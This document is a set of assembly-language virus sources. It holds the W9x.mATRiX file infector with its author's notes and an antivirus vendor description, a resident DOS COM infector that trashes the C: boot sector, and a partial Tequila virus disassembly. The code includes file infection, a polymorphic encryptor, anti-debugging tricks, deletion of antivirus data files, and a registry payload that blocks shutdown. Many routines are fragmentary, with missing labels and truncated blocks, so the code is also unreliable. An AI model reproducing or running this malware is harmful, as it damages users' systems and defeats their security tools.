call MessageBoxA,0,offset szMsg,offset szTtl,0
call ExitProcess,0
virus_init endp
_TEXT ends
;comment ÿ
;
;released
;
;· ─═─════─═════════════════════─·─════════════════════════════════════─═══─═─ ·
; ▄▄▄▄▄ ░
; ████ ░ ▀▀▀▀ ████▀███ ████▀████ ████ ████■▀▀▀▀ ████▀████ ████▀████2000
; ░ ▓███ ░ ████ ▓███▄ ░ ████■ ████ ░ ▓███ ████ ████ ░ ▓███■ ░
;░░░░▓███░████░▓███░████░░░░░████░████░▓███░█░████░▓███░▓███░░░░░░▓███░████░ ░░
; ░ ▓███▄████▄▓███ ▓███ ░ ▓███▄████ ▓███▄█▄████ ▓▓██▄▓███ ░ ░▓███▄████[LW]
; ▀▀▀▀▀▀▀ ░
; W9x.mATRiX.size by LiFEwiRE [ShadowVX] - www.shadowvx.org
;
;
; Intro
;
; This virus is my first windows virus, and the result of reading some
; docs, tutorial and (Ring0 virus)-sources.
;
; It is not a very complicated virus, and it doesn't use new techniques
; either... Maybe the ASCII counter is an unusual feature.
;
; When debugging is enabled, these things are extra:
;
; Unload when dword at bff70400 <> 0h
; Beep at certain events (get resident, unload & infect)
; Beep can be turned off by changing byte ptr at bff70408 <> 0h
; only infects files at your D: drive (it's my test drive)
;
; I use WinIce to modify the values.
;
; Specs:
;
; Ring0 resident, infects on IFSmgr file rename, open and attrib, EXE,
; SCR and COM (!) files. Com files are infected for the payload, a scene
; from The Matrix. The COM files are not really infected, but some date
; checking code and action is appended on it. When the month is equal
; to the date the payload will start.
;
; Infection : Increasing the last section, and making a jump at the original
; entrypoint to it (when modifying EP to last section
; AVPM will popup:( )
;
; Encryption : XOR'd and polymorphic-build-up-decryptors.
; Armour : Anti debugger & anti emulator (SEH & Anti-SoftICE)
;
; Payload(s) : 2, as i said above 1 which is appended to all .com files
; on opening and c:\windows\win.com which will display
; 'Wake up Neo... / The Matrix has you... / w9x.mATRiX'
; like in the movie (except the last sentence, w9x.mATRiX:)
; when the day is equal to the month (1 jan, 2 feb,etc.)
;
; the other payload will remove the shutdown command from
; the start menu using the registry - on 6 April.
;
; KnownBugs : None I know of... I tested this code a lot, and a friend of mine
; : infected his own PC accidentally and it worked really well
; :)... The only problem is that F-prot hangs on infected
; files... hehe but that's not my problem :)
;
; Thanx to : Lord Julus, Billy Belcebu & Z0MBiE.
;
; Greets to : Ruzz', Kamaileon, z3r0, Bhunji, Dageshi, all other Shadow-
; VX members,
; r-, GigaByte, VirusBuster, CyberYoda, T00fic, all other
; people i met on #virus & #vir, and 29A & iKX for their
; nice magazines.
;
; and some non-virus greets:
;
; Ghostie :P, Hampy, some more XXXClan'ers, DJ Accelerator,
; King Smozzeboss SMOS from Conehead SMOS games [NL1SMS]
; PiepPiep, NL0JBL, BlueLIVE, MisterE & Xistence.
;
; Compile: Tasm32 /m3 /ml LiFEwiRE.ASM,
; tlink32 /Tpe /aa /c LiFEwiRE.OBJ,,,import32.lib
; pewrsec LiFEwiRE.EXE
;
; Contact: Lifewire@mail.ru
;
;
;·─═─════─═════════════════════════════─·─════════════════════════════─═══─═─ · ÿ
;
;Description at www.viruslist.com
;
;Win95.Matrix
;
;
;It is not a dangerous memory resident polymorphic parasitic Win9x virus. It
;stays in the Windows memory as a device driver (VxD) by switching from
;application mode to Windows kernel (Ring3->Ring0), hooks disk file access
;functions, and infects PE executable files with EXE and SCR file name
;extensions, and affects DOS COM files.
;
;While infecting a PE EXE file the virus encrypts itself and writes to the
;file end. The virus also patches program's startup code with a short routine
;that passes control to main virus code.
;
;While affecting DOS COM files the virus writes to the end of file a short
;routine that has no infection abilities, but just displays a message on
;July 7th:
;
; Wake up, Neo...
; The Matrix has you...
; w9x.mATRiX
;
;The virus also affects the C:\WINDOWS\WIN.COM file in the same way.
;
;On April 6th the virus modifies the system registry key:
;
;HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer NoClose = 1
;
;As a result of this key a user cannot switch off the computer.
;
;The virus also deletes anti-virus data files: AVP.CRC, ANTI-VIR.DAT, IVB.NTZ,
;CHKLIST.MS.
;
;The virus contains the text strings:
;
;[- comment from LiFEwiRE- AV'ers forgot to put the strings here??]
;
;where 'xxxxxxx' is the virus' "generation" number.
;
;
;·─═─════─═════════════════════════════─·─════════════════════════════─═══─═─ · ÿ
.486p
.model flat
locals
jumps
if debug eq 1
inthook equ 05h ;let's hook this int for ring0
else
inthook equ 03h ;let's hook this int for ring0
endif
if debug eq 1
; display "Debug Version"
else
display " °±²Û *Warning* This is the real version of the virus Û²±°"
endif
start:
pushad
call getdelta
getdelta:
pop ebp
sub ebp,offset getdelta
pushad
setupSEHandKillEmu:
xor edx,edx ;fs:[edx] is smaller than fs:[0]
push dword ptr fs:[edx] ;Push original SEH handler
mov fs:[edx],esp ;And put the new one (located
dec byte ptr cs:[edx] ;make error & let our SEH take
;control (not nice 4 emu's:)
backtocode:
popad
SetupSEH:
xor edx,edx ;we are safe now; if an error
push dword ptr fs:[edx] ;occurs EIP will be at the
mov fs:[edx],esp ;code after SetupSEH
push edx
sidt fword ptr [esp-2] ;'push' int table
pop edx ;restore stack from call and
;edx contains pointer to IDT
RestoreSEH:
xor edx,edx
pop dword ptr fs:[edx]
pop edx ;pops offset pushed by CALL
popad
push eax
ret
;----------------------------------------------------------------------------;
; **** RING0 LOADER ****
;----------------------------------------------------------------------------;
Inthandler:
pushad
mov eax,0bff70404h ;already loaded?
cmp dword ptr [eax],eax
je back2ring3
mov dword ptr [eax],eax
push eax
push edi
lea esi,[offset start+ebp] ;set source
mov ecx,virusz ;virussize
cld ;you never know with poly :)
rep movsb ;copy virus to allocated mem
pop edi
mov [edi+nexthook-start],eax
pop eax
push PC_STATIC
push 020060000h ;new paging settings
push SizeInPages*2
shr eax, 12
push eax
VxD5V equ 00010133h
VxD5: VMMCall PageModifyPermissions
add esp, 4*4
if debug eq 1
call debug_beep2
endif
back2ring3:
if debug eq 1
call debug_beep
endif
popad
iretd ;exit int (to ring3!)
;----------------------------------------------------------------------------;
host:
oldbytes:
Push 0
Call ExitProcess
db JmpToCodesz-5 dup (176d)
;----------------------------------------------------------------------------;
; **** FILESYSTEM HOOK ****
;----------------------------------------------------------------------------;
hook:
push ebp
mov ebp,esp
sub esp,20h
push ebx
push esi
push edi
if debug eq 1
cmp dword ptr [death-start+edi],'TRUE'
je back
endif
back:
mov eax,[ebp+28] ; call the old
push eax
mov eax,[ebp+24]
push eax
mov eax,[ebp+20]
push eax
mov eax,[ebp+16]
push eax
mov eax,[ebp+12]
push eax
mov eax,[ebp+8]
push eax
db 0b8h
nexthook dd 0
call [eax]
add esp,6*4
pop edi
pop esi
pop ebx
leave
ret
;----------------------------------------------------------------------------;
; **** SOME CHECKS BEFORE INFECTING ****
;----------------------------------------------------------------------------;
infect:
pushad
if debug eq 1
mov eax,0bff70400h
mov eax,dword ptr [eax]
or eax,eax
jz stayalive ;kill ourself?
call debug_beep
call debug_beep2
call debug_beep2
call debug_beep2
call debug_beep
mov eax,0bff70400h
xor edx,edx
mov dword ptr [eax],edx
mov dword ptr [eax+4],edx
stayalive:
endif
not eax ;
cmp eax,not 'EXE.' ;normal exe?
je infectit
quitinfect:
jmp back
db "<w9x.mATRiX."
db virusz/1000 mod 10+'0'
db virusz/0100 mod 10+'0'
db virusz/0010 mod 10+'0'
db virusz/0001 mod 10+'0',"."
counter db "0001086 & MyLittlePoly." ;enough space for counter :)
db polysz/1000 mod 10+'0'
db polysz/0100 mod 10+'0'
db polysz/0010 mod 10+'0'
db polysz/0001 mod 10+'0'
if debug eq 1
db " Debug Version"
endif
cryptkey dd 0
cryptkey2 dw 0
;----------------------------------------------------------------------------;
; **** REAL PE INFECTION PART ****
;----------------------------------------------------------------------------;
infectit:
call checkname
jc quitinfect ;if name = bad
if debug eq 1
cmp word ptr [esi],":D"
jne quitinfect
endif
pop eax
inc eax ;eax=4300+1 = set
push eax
push ecx ;save attribs
push esi ;and esi,no new LEA needed
xor ecx,ecx ;new attr
call R0_FileIO
push ebp
push edi
push ebx ;save handle for after calcs.
mov ebp,edi
mov edi,esi
add esi,18h ;esi+18h=start of OptionalHeader
add si,word ptr [esi+14h-18h] ;esi-4 = pe/0/0+14h = size OH
;optionalheader+size=allocation table
push esi
xor ecx,ecx
mov cx,word ptr [edi+6] ;put in ecx nr. of sections
xor eax,eax ;startvalue of eax
push cx ;
sectionsearch:
cmp dword ptr [esi+14h],eax ;is it the highest?
jb lower ;no
mov ebx,ecx ;remember section nr.
mov eax,dword ptr [esi+14h] ;and remember value
lower:
add esi,28h ;steps of 28h
loop sectionsearch
pop cx
sub ecx,ebx
push esi
add eax,[esi+0Ch]
mov [edi+50h],eax
mov esi,edi
add esi,18h ;esi+18h=start of OptionalHeader
add si,word ptr [esi+14h-18h] ;esi-4 = pe/0/0+14h = size OH
sub esi,28h
pop esi
pop edx
pop ebx
push edx ;
push esi
push eax
mov eax,ecx
mov ecx,[edi+3Ch] ;ECX = Alignment
push edx ; Align
xor edx,edx
push eax
div ecx
pop eax
sub ecx,edx
add eax,ecx
pop edx
mov ecx,eax ;aligned size to append
pop esi
pop edx
push edi
lea esi,[ebp+viruscopy-start] ;polymorpher returns size in
mov eax,R0_WRITEFILE ;the ECX register
push eax
call R0_FileIO ;append virus
pop eax
pop esi
mov ecx,1024
mov edx,[ebp+pointertope-start]
call R0_FileIO ;overwrite PE header
pop edi
pop ebp
nope:
mov eax,R0_CLOSEFILE
call R0_FileIO
if debug eq 1
call debug_beep
endif
call killAVfiles
call infectwindotcom ;for payload
jmp dontinfect
avpcrc db 9,"AVP.CRC",0h
antivirdat db 14,"ANTI-VIR.DAT",0h
ivbntz db 9,"IVB.NTZ",0h
chklistms db 12,"CHKLIST.MS",0h
killAVfiles:
pushad
;first add the path to the filename
mov ebp,edi
mov ecx,4
killing:
call killthisfile
xor ebx,ebx
mov bl,byte ptr [edx]
add edx,ebx
loop killing
popad
ret
killthisfile:
pushad
lea edi,[offset filename-start+ebp]
push edi
mov al,'.'
cld
scasb ;search from left to right for the dot
jne $-1
std
mov al,'\' ;search from right to left for the \
scasb
jne $-1
xor ecx,ecx
cld
mov esi,edx
lodsb
mov cl,al
rep movsb
pop esi
mov eax,R0_DELETEFILE
mov ecx,2027h
call R0_FileIO
popad
ret
;--------------------------------------------------------------------------
; **** MODIFIES COM FILES FOR PAYLOAD, SPECIAL FOR WIN.COM ***
;--------------------------------------------------------------------------
infectwindotcomflag db 0h
push edi
jmp payloadinfector
backfrominfecting:
;--------------------------------------------------------------------------
;--------------------------------------------------------------------------
payloadinfector:
if debug eq 1
cmp dword ptr [esi-8],'PRUB' ;*BURP.COM ?
jne wegvancom
endif
mov eax,R0_GETFILESIZE
call R0_FileIO ;get its size
push eax
sub eax,4
mov word ptr [edi+jmpval-start],ax ;distance to jmp
pop eax
pop edx ;place to append
push edx
lea esi,[edi+offset dospayload-start]
mov ecx,dospayloadsize
call R0_FileIO
pop edx
mov ecx,7
closecomfile:
mov eax,R0_CLOSEFILE
call R0_FileIO
wegvancom:
if debug eq 1
call debug_beep
endif
jmp quitinfect
;--------------------------------------------------------------------------
;--------------------------------------------------------------------------
; *** BEEPS used if debug equ 1 ***
;--------------------------------------------------------------------------
if debug eq 1
debug_beep:
push eax
push ecx
mov eax,0bff70408h
cmp byte ptr [eax],0
jne geenirritantgebiepvandaag
in al, 61h
or al, 3
out 61h, al
in al, 61h
and al, not 3
out 61h, al
pop ecx
pop eax
ret
debug_beep2:
push eax
push ecx
in al, 61h
or al, 3
out 61h, al
in al, 61h
and al, not 3
out 61h, al
pop ecx
pop eax
ret
endif
;--------------------------------------------------------------------------
; File IO function, called a lot of times, better for patching callback
;--------------------------------------------------------------------------
R0_FileIO:
VxD4V equ Ring0_FileIO+256*256*IFSMgr
VxD4: VxDCall IFSMgr, Ring0_FileIO
ret
;--------------------------------------------------------------------------
;--------------------------------------------------------------------------
; Increases the ASCII counter of infections
;--------------------------------------------------------------------------
next:
inc byte ptr [esi]
cmp byte ptr [esi],'9'+1
jb ok
mov byte ptr [esi],'0'
dec esi
jmp next
ok:
ret
;--------------------------------------------------------------------------
;------------------------------------------------------------------------------
; Some things used in the registry payload
;------------------------------------------------------------------------------
KeyOfPolicies db "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer",0h
valuename1 db "NoClose",0h ;no shutdown :)
ValueToSet dd 1h
CheckThePayloadDate:
add esp,6*4
noPayload:
ret
;--------------------------------------------------------------------------
;--------------------------------------------------------------------------
; Patches the VxDCalls (on execution Windows modifies them to a real call)
;--------------------------------------------------------------------------
VxDPatch:
pushad
mov bx,020cdh ;int 20 used by VxDCall
popad
ret
;--------------------------------------------------------------------------
rnd32_seed dd 0h
;------ this code is put at the EIP of the host and jumps to the virus code -----------;
JmpToCode:
stc
db 066h,0fh,083h ;jnc
randombla dw ? ;some place
mov eax,12345678h
distance equ $-4
push eax
ret
EndJmpToCode:
;----------------------------------------------------------------------------;
;this sweet code will be appended to .com files (234 / 0eah bytes large)
;--------------------------------------------------------------------------
; * Checks the name of the file to be infected
;--------------------------------------------------------------------------
mov al,'.'
cld
scasb ;search from left to right for the dot
jne $-1
std
mov al,'\' ;search from right to left for the \
scasb
jne $-1
cld
checkname2:
xor eax,eax ;for load AL
lodsb ;size of string in al
or al,al
jz didit
mov ecx,eax ;counter for bytes
push edi ;save pointer to filename
rep cmpsb ;compare stringbyte
pop edi
jz ArghItIsAshitFile
add esi,ecx
jmp checkname2
ArghItIsAshitFile:
popad
stc
ret
didit:
popad
clc
ret
;--------------------------------------------------------------------------
;--------------------------------------------------------------------------
; *** POLYMORPHIC engine which generates decrypter & encrypts code ***
;--------------------------------------------------------------------------
;
; The generated code will look like this:
;
; pushad
; lea RegUsedAsPointer,[eax+placewherecryptedcodestarts]
; mov keyregister,randomvalue
; sub keyregister,randomvalue
; mov counterreg,size
; again:
; mov tempregister,[RegUsedAsPointer]
; xor tempregister,keyregister
; mov [RegUsedAsPointer],tempregister
; add RegUsedAsPointer,4
; dec counterreg
; pushf
; popf
; jz exit
; jmp again
; exit:
;
;
; between each instruction some random code is put.
polysz equ offset polyend - offset encrypt
encrypt:
push eax
push ebx
push edx
push esi
push edi
call gengarbage
;--------PUSHAD--
mov al,60h ;pushad
stosb
;--------MOV-----
call gengarbage
call gengarbage
call gengarbage
;--------MOV-----
add al,0b8h ;make a MOV reg, rndvalue
stosb
call get_rnd32
stosd
;----------------
call gengarbage
;--------SUB-----
mov al,081h ;make a SUB reg, rndvalue
add ah,0e8h
stosw
call get_rnd32
stosd
;----------------
getregforsize:
call getrndal
cmp al,4 ;do not use ESP
je getregforsize
cmp al,cl ;nor keyreg
je getregforsize
cmp al,ch ;nor offsetreg
je getregforsize
mov dh,al
call gengarbage
;*** AT THIS POINT IS EDI THE OFFSET FOR THE JMP ***
mov esi,edi
mov dl,al
call gengarbage
call gengarbage
call gengarbage
mov al,dl
call gengarbage
call gengarbage
call gengarbage
inc ah ;popf
stosw
;---JZ OVER------
mov ax,074h
stosw
push edi
;----------------
call gengarbage
mov edx,edi
sub edx,eax
cmp edx,080h-5 ;80h = max JZ distance, 5 is size of JMP BACK
ja regenerate
;----JMP BACK----
sub esi,edi
mov al,0e9h
stosb
mov eax,0fffffffbh
add eax,esi
stosd
;----------------
;----PATCH JZ----
pop esi ;esi-1 = jz value
mov eax,edi
sub eax,esi
mov byte ptr [esi-1],al
;----------------
call gengarbage
;----POPAD-------
mov al,61h ;popad
stosb
;----------------
call gengarbage
;----PATCH LEA---
pop esi ;patch LEA reg1,[EAX+startofcrypted]
push edi
sub edi,offset viruscopy-start
sub edi,ebp
mov dword ptr [esi+2],edi
pop edi
;----------------
pop edi
pop esi
pop edx
pop ebx
pop eax
ret
;----------------------------------------------------------------------------;
; Generates a lot of random instructions which look good but do nothing
; (they indirectly undo themselves)
;----------------------------------------------------------------------------;
gengarbage:
push eax
push ebx
push ecx
push edx
push esi
garbageloop:
call get_rnd32
and al,1111b
cmp al,1
je genadd ;OK
cmp al,2
je gensub ;OK
cmp al,3
je genxor ;OK
cmp al,4
je genmov ;OK
cmp al,5
je genpush ;OK
cmp al,6
je geninc ;OK
cmp al,7
je gendec ;OK
cmp al,8
je gencmp ;OK
cmp al,9
je genjunk ;OK
cmp al,0eh
jb garbageloop
exitgen:
pop esi
pop edx
pop ecx
pop ebx
pop eax
ret
;-----------------------------------------------------------------------------
; Generates random add
;-----------------------------------------------------------------------------
genadd:
call getrndal
cmp al,4
je genadd ;4 = esp, leave it alone
cmp ah,80h
jb addandsub ;generate an add - code - sub
and eax,111b
call pushregister
call gengarbage
call gengarbage
call popregister
jmp exitgen
savetoadd:
call randomadd
jmp exitgen
addandsub:
push eax
xchg al,ah
mov al,081h
add ah,0c0h
stosw
push eax
call get_rnd32
stosd
push eax
call gengarbage
pop ebx
pop eax
add ah,028h
stosw
mov eax,ebx
stosd
pop eax
jmp exitgen
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Generates random sub
;-----------------------------------------------------------------------------
gensub:
call getrndal
cmp al,4
je gensub ;4 = esp, leave it alone
cmp ah,80h
jb subandadd ;generate an add - code - sub
and eax,111b
call pushregister
call gengarbage
call gengarbage
call popregister
jmp exitgen
savetosub:
call randomsub
jmp exitgen
subandadd:
push eax
xchg al,ah
mov al,081h
add ah,0e8h
stosw
push eax
call get_rnd32
stosd
push eax
call gengarbage
pop ebx
pop eax
sub ah,028h
stosw
mov eax,ebx
stosd
pop eax
jmp exitgen
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Generates random xor
;-----------------------------------------------------------------------------
genxor:
call getrndal
cmp al,4
je genxor
cmp ah,80h
jb genxorxor ;generate an xor - code - xor
and eax,111b
jmp exitgen
savetoxor:
call randomxor
jmp exitgen
genxorxor:
push eax
xchg al,ah
add ah,0f0h
mov al,081h
stosw
push eax
call get_rnd32
stosd
push eax
call gengarbage
pop ebx
pop eax
stosw
mov eax,ebx
stosd
pop eax
jmp exitgen
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Generates random mov
;-----------------------------------------------------------------------------
genmov:
call getrndal
cmp al,4
je genmov
jmp exitgen
savetomov:
call randommov
jmp exitgen
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Generates random push
;-----------------------------------------------------------------------------
genpush:
call getrndal
cmp al,4
je genpush
and eax,111b
call pushregister
call gengarbage
call popregister
jmp exitgen
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Generates random inc
;-----------------------------------------------------------------------------
geninc: ;40
call getrndal
cmp al,4
je geninc
cmp ah,80h
ja genincdec
and eax,111b
call pushregister
call gengarbage
add al,040h
stosb
call gengarbage
sub al,040h
call popregister
jmp exitgen
savetoinc:
add al,040h
stosb
jmp exitgen
genincdec:
add al,40h ;inc
stosb
call gengarbage
jmp exitgen
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Generates random dec
;-----------------------------------------------------------------------------
gendec: ;48
call getrndal
cmp al,4
je gendec
cmp ah,80h
ja gendecinc
and eax,111b
call pushregister
call gengarbage
add al,048h
stosb
call gengarbage
sub al,048h
call popregister
jmp exitgen
savetodec:
add al,048h
stosb
jmp exitgen
gendecinc:
add al,48h
stosb
call gengarbage
sub al,8h
stosb
jmp exitgen
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Pushes register in al
;-----------------------------------------------------------------------------
pushregister:
push eax
add al,050h
stosb
pop eax
ret
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Pops register in al
;-----------------------------------------------------------------------------
popregister:
push eax
add al,058h
stosb
pop eax
ret
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Generates random add reg, value or add reg1,reg2 - reg = al
;-----------------------------------------------------------------------------
randomadd:
push eax
call get_rnd32
cmp al,80h
pop eax
push eax
ja addregreg
call randomaddvalue
rndaddb:
pop eax
ret
addregreg:
call randomaddreg
jmp rndaddb
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Generates random add reg,value - reg = al
;-----------------------------------------------------------------------------
; 81 c0+reg value
; reg = eax 05 value
randomaddvalue:
push eax
xchg al,ah
mov al,081h
add ah,0c0h
stosw
backfromaddeax:
call get_rnd32
stosd
pop eax
ret
addeax:
mov al,05h
stosb
jmp backfromaddeax
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Generates random add reg1,reg2 - reg1 = al
;-----------------------------------------------------------------------------
randomaddreg:
push eax
mov bl,al
call getrndal
shl bl,3
add al,0c0h
mov ah,03h
xchg ah,al
stosw
pop eax
ret
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Generates random sub reg, value or sub reg1,reg2 - reg = al
;-----------------------------------------------------------------------------
randomsub:
push eax
call get_rnd32
cmp al,80h
pop eax
push eax
ja subregreg
call randomsubvalue
rndsubb:
pop eax
ret
subregreg:
call randomsubreg
jmp rndsubb
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Generates random sub reg,value - reg = al
;-----------------------------------------------------------------------------
; 81 c0+reg value
; reg = eax 05 value
randomsubvalue:
push eax
xchg al,ah
mov al,081h
add ah,0e8h
stosw
backfromsubeax:
call get_rnd32
stosd
pop eax
ret
subeax:
mov al,05h
stosb
jmp backfromsubeax
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Generates random sub reg1,reg2 - reg1 = al
;-----------------------------------------------------------------------------
randomsubreg:
push eax
mov bl,al
call getrndal
shl bl,3
add al,0c0h
mov ah,03h
xchg ah,al
stosw
pop eax
ret
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Generates a xor reg, value or xor reg, reg2 - reg = al
;-----------------------------------------------------------------------------
randomxor:
push eax
call get_rnd32
cmp al,80h
pop eax
push eax
ja xorvalue
call randomxorreg
rndxorr:
pop eax
ret
xorvalue:
call randomxorvalue
jmp rndxorr
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Generates a random xor reg,reg2 - reg = al
;-----------------------------------------------------------------------------
randomxorreg:
push eax ;6633
mov bl,al
call getrndal
shl bl,3
add al,0c0h
mov ah,033h
xchg ah,al
stosw
pop eax
ret
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Generates a random xor reg,value
;-----------------------------------------------------------------------------
randomxorvalue:
push eax
add al,0f0h
mov ah,081h
xchg al,ah
stosw
call get_rnd32
stosd
pop eax
ret
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; generates a random mov reg,value or reg,reg2
;-----------------------------------------------------------------------------
randommov:
push eax
cmp ah,080h
jb movreg
call randommovvalue
movback:
pop eax
ret
movreg:
call randommovreg
jmp movback
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Generates a random mov reg,value
;-----------------------------------------------------------------------------
randommovvalue:
push eax
add al,0b8h
stosb
call get_rnd32
stosd
pop eax
ret
;-----------------------------------------------------------------------------
; generates a random mov reg,reg2
;-----------------------------------------------------------------------------
randommovreg: ;8b (c0+reg) or reg2
push eax
mov bl,al
call getrndal
shl bl,3
or al,bl ;mix instructions
xchg ah,al
mov al,08bh
add ah,0c0h
stosw
pop eax
ret
;-----------------------------------------------------------------------------
; generates a random cmp reg,reg2 or cmp reg,value
;-----------------------------------------------------------------------------
gencmp: ;39/3b
call get_rnd32
cmp ah,0c0h
jb gencmp
cmp al,80h
ja gencmpvalue
push eax
call get_rnd32
mov bh,039h
cmp al,80h
ja gencmp1
add bh,2
gencmp1:
pop eax
mov al,bh
cld
stosw
jmp exitgen
gencmpvalue: ;81f8
and eax,0111b
add ax,081f8h
xchg al,ah
stosw
call get_rnd32
stosd
jmp exitgen
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Generate junk f8 - fd
;-----------------------------------------------------------------------------
genjunk:
call get_rnd32
cmp al,0f8h
jb genjunk
cmp al,0fdh
ja genjunk
stosb
jmp exitgen
;-----------------------------------------------------------------------------
getrndal:
call get_rnd32
and al,111b
ret
xchg eax,ecx
rdtcs ;just 4 some xtra randomness
xchg eax,ecx
xor eax,ecx
pop esi
pop edi
pop edx
pop ebx
pop ecx
ret
polyend:
end:
;----------------------------------------------------------------------------;
pointertope dd ?
if debug eq 1
death dd ? ;kill ourself flag
endif
busy dd ?
filename db 100h dup (0h)
peheader db 1024 dup (0h)
whereappend dd ?
pushtable db 8 dup (0h)
memend:
_CODE ends
;----------------------------------------------------------------------------;
;----------------------------------------------------------------------------;
_DATA segment dword use32 public 'DATA'
fill db ?
_DATA ends
_burp segment dword use32 public 'LiFEwiRE'
fill2 db ?
_burp ends
;----------------------------------------------------------------------------;
end start
end
; Resident .COM midfile infector - 666 bytes - 02/2000 by T-2000/IR.
; Uses the INT 21h ISR to locate a suitable place to put the CALL_Virus.
.286
.MODEL TINY
.CODE
START:
PUSHF ; Save registers.
PUSHA
PUSH DS
PUSH ES
CALL Get_IP
DEC CX ; CX = -1
JNP Restore_Host ; Endless loop?
XOR DI, DI
PUSH ES
PUSH ES
POP DS
POP DS
Trash_Boot:
MOV AL, 2 ; Trash the bootsector of C:.
MOV CX, 1
XOR DX, DX
SEGCS ; Stupid anti-TBClean trick.
INT 26h
New_Int21h:
CMP AX, 2000h ; Virus residency call.
JNE Check_Exit
CBW ; AX = 0.
MOV BP, SP
MOV DS, [BP+(11*2)] ; DS = CS of calling INT 21h.
XCHG SI, AX ; SI = 0.
CALL Infect_File
Seek_EOF:
MOV AX, 4202h ; Seek to the end of file.
XOR CX, CX
CWD
INT 66h
Do_RETN: RETN
Infect_File:
MOV AX, 4300h ; Get file's attributes.
LEA DX, [SI+3]
INT 66h
JC Do_RETN
JMP Restore_Attr
PUSH CS
POP DS
CALL Seek_EOF
MOV DX, DI
DEC DH ; Minus PSP (100h).
PUSH DX
POP DX
SUB SI, 3
CALL Seek_EOF
RETN
End_Body:
Int_Count DB 0
Header DB 4 DUP(0)
; Amen.
END START
; Tequila.2468.A (exact) disasm.
; Multipartite semi-stealth polymorphic MBS & .EXE-infector.
; Bugs marked with '***'.
; T-2000/IR, March 2000.
.MODEL TINY
.STACK 512
.CODE
START:
Check_Activate:
PUSH BP
MOV BP, SP
PUSH CS
POP DS
XOR BX, BX
MOV CX, 30
MOV [BP-(4*2)], AX
MOV [BP-(3*2)], DX
MOV [BP-(6*2)], AX
MOV [BP-(5*2)], DX
CMP DX, 15
JAE LOC_12
ADD AX, DI
MOV [BP-(2*2)], AX
ADD AX, SI
MOV [BP-(1*2)], AX
LOOP LOCLOOP_11
LOC_12: INC CX
SHR CL, 1
MOV CH, CL
MOV CL, 0DBh
MOV ES:[BX], CX
INC BX
INC BX
ADD SI, 18
CMP SI, 1B8h
JL LOC_10
ADD DI, 52
Exit_Activate: POP DS
POP ES
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
MOV SP, BP
POP BP
RETN
PUSH CS
POP DS
POP DS
POP DX
RETN
XOR DI, DI
Relocated_Boot: PUSH CS
POP DS
PUSH CS
POP ES
CLD
MOV SI, OFFSET New_Int13h
MOV DI, OFFSET New_Int13h_Copy
MOV CX, (New_Int1Ch-New_Int13h)
REP MOVSB
MOV SI, OFFSET Append_Body_Encrypted
MOV DI, OFFSET Append_Body_Encrypted_Copy
MOV CX, (Decryptor-Append_Body_Encrypted)
REP MOVSB
CLI
STI
Init_Virus:
CALL Get_IP ; Calculate the virus'
Get_IP: POP SI ; delta offset in this CS.
SUB SI, OFFSET Get_IP
PUSH CS
POP DS
ADD [SI+(Host_CS-START)], AX
ADD [SI+(Host_SS-START)], AX
CMP BYTE PTR ES:[0], 'Z' ; Make sure this block is the
JNE Run_Host ; last one in the chain, else
; higher blocks might get
; damaged.
PUSH ES ; DS=ES=PSP.
POP DS
Infect_MBS:
MOV AH, 2Ah ; Get the current date.
INT 21h
PUSH DS
POP ES
PUSHF
JMP Exit_Inf_MBS
JMP Exit_Inf_MBS
PUSHF
CALL DWORD PTR Old_Int13h
JC Exit_Inf_MBS
INC CX
Exit_Inf_MBS: RETN
New_Int01h:
PUSH BP ; Setup a stack pointer.
MOV BP, SP
PUSH AX
PUSH ES
POP ES
POP AX
Exit_Int01h: POP BP
IRET
New_Int13h:
CMP CX, 1 ; Track 0, sector 1 ?
JNE JMP_Old_Int13h
PUSH CX
PUSH DX
PUSH AX
PUSH BX
POP DX
POP CX
New_Int1Ch:
PUSH AX
PUSH BX
PUSH ES
PUSH DS
PUSH CS
POP DS
Exit_Int1Ch: POP DS
POP ES
POP BX
POP AX
IRET
New_Int21h:
CMP AH, 11h ; Findfirst (FCB) ?
JB Check_Dir_St
CALL Display_Message
IRET
CALL Check_Activate
JMP Restore_Stack
New_Int24h:
MOV AL, 03h ; Fail operation.
IRET
FCB_Stealth:
PUSH BX
PUSH ES
PUSH AX
PUSHF
PUSH AX
Exit_FCB_St: POP AX
POPF
POP ES
POP BX
RETN
Dir_Stealth:
PUSH BX
PUSH ES
PUSH AX
POP AX
PUSHF
PUSH AX
JC Exit_Dir_St ; Get out if error.
Exit_Dir_St: POP AX
POPF
POP ES
POP BX
RETN
Write_File:
MOV AH, 40h ; Write to file.
JMP Do_Read_Write
Read_File:
MOV AH, 3Fh ; Read from file.
Do_Read_Write: CALL Load_BX_Int21h
JC Exit_Re_Wr ; If error then exit with CF.
Seek_EOF:
XOR CX, CX ; Seeks to end of file.
XOR DX, DX
Seek_EOF_Rel: MOV AX, 4202h ; Seeks EOF relative.
JMP Load_BX_Int21h
Seek_BOF:
XOR CX, CX ; Seeks to begin of file.
XOR DX, DX
MOV AX, 4200h
Load_BX_Int21h: MOV BX, CS:File_Handle ; Load the filehandle.
RETN
Infect_File:
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
PUSH ES
